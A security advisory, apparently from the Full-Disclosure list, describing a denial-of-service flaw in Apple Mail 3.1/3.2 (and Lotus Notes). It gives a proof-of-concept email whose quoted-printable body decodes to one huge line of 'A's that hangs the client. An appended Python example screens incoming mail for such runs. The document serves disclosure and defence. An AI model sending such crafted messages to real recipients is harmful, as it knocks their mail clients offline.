***Summary***

A maliciously crafted e-mail message can cause a denial of service in multiple versions of the Apple Mail e-mail client.

***Scope***

Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)

Note: other versions of this product may be vulnerable as well; I have not tested them.

The vendor has been made aware of this issue and has chosen not to treat it as a security issue.

Interestingly enough, a similar issue seems to be present in multiple versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611). The exploit provided in this advisory will also cause a denial of service condition on multiple versions of IBM Lotus Notes. IBM has been kind enough to create SPR# PRAD7DPKLW to address the issue the exploit targets.

***Description***

An e-mail message with a maliciously crafted body (in my tests I used a long line) can cause the e-mail client to hang, resulting in a denial of service condition. Testing with e-mails that do not contain any newline characters (0x0A, 0x0D) or spaces (0x20) shows that a single line of 1.5 MB can cause the e-mail clients to hang for over half an hour.

Initial testing reveals the following: in Apple Mail, the e-mail is rendered correctly in the preview pane, but a subsequent click on a different e-mail causes the application to hang.

***Credits***

David Wharton

***References***

Apple Mail
http://www.apple.com/macosx/features/mail.html

***PoC Exploit***

Below is a sample e-mail with headers (some headers removed or modified) that causes the e-mail clients to hang as discussed. Note that the body is one long line; the "=" character at the end of each line is not part of the body but is there for formatting (the body is quoted-printable encoded), so in reality most of the body is one long contiguous string of A's.
Subject: dos test
MIME-Version: 1.0
From: xxxxx@xxxxx.com
To: xxxxx@xxxxx.com
Date: xxxxx
Message-ID:
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@xxxxx.com
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
(removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN=
OTICE: This e-mail message and all attachments transmitted with it may con=
tain confidential information intended solely for the use of the addressee.=
=

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
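The condition the advisory describes (a body that decodes to one contiguous run with no newline or space) can be screened for at a mail gateway before a client has to lay it out. The Python check below is an added example and is not part of the advisory; the 4096-byte threshold and the constructed sample message are assumptions. It decodes the transfer encoding before measuring, because the quoted-printable soft breaks ("=" at the end of each wire line) keep the raw lines short while the decoded body is a single line.

```python
import email
import email.policy
import quopri
import re

# Threshold is an assumption: the advisory reports hangs at 1.5 MB, so a
# gateway would pick something far below that.
MAX_RUN = 4096

# Runs of bytes containing none of LF (0x0A), CR (0x0D) or space (0x20),
# the three separators the advisory's test messages were stripped of.
_RUN = re.compile(rb"[^\x0a\x0d\x20]+")


def longest_unbroken_run(data: bytes) -> int:
    """Length of the longest run of bytes with no LF, CR or space."""
    return max((len(m.group(0)) for m in _RUN.finditer(data)), default=0)


def message_max_run(raw: bytes) -> int:
    """Largest unbroken run across all decoded text parts of a raw message."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    worst = 0
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        # decode=True undoes quoted-printable / base64, so soft line breaks
        # ("=" at the end of a wire line) vanish and the real line length shows.
        body = part.get_payload(decode=True) or b""
        worst = max(worst, longest_unbroken_run(body))
    return worst


def is_suspicious(raw: bytes, limit: int = MAX_RUN) -> bool:
    """True when any text part decodes to a run longer than `limit` bytes."""
    return message_max_run(raw) > limit


def build_sample(run_length: int) -> bytes:
    """Constructed test message in the shape of the advisory's PoC: text/html,
    quoted-printable, one contiguous run of 'A's (soft breaks added by quopri)."""
    body = quopri.encodestring(b"A" * run_length)
    headers = (b"Subject: dos test\r\n"
               b"MIME-Version: 1.0\r\n"
               b"Content-Type: text/html; charset=ISO-8859-1\r\n"
               b"Content-Transfer-Encoding: quoted-printable\r\n\r\n")
    return headers + body


if __name__ == "__main__":
    for n in (100, 10000):
        print(n, message_max_run(build_sample(n)), is_suspicious(build_sample(n)))
```

A check on raw wire-line length alone would pass the sample, since every encoded line is under 76 bytes; only the decoded payload reveals the 10000-byte run.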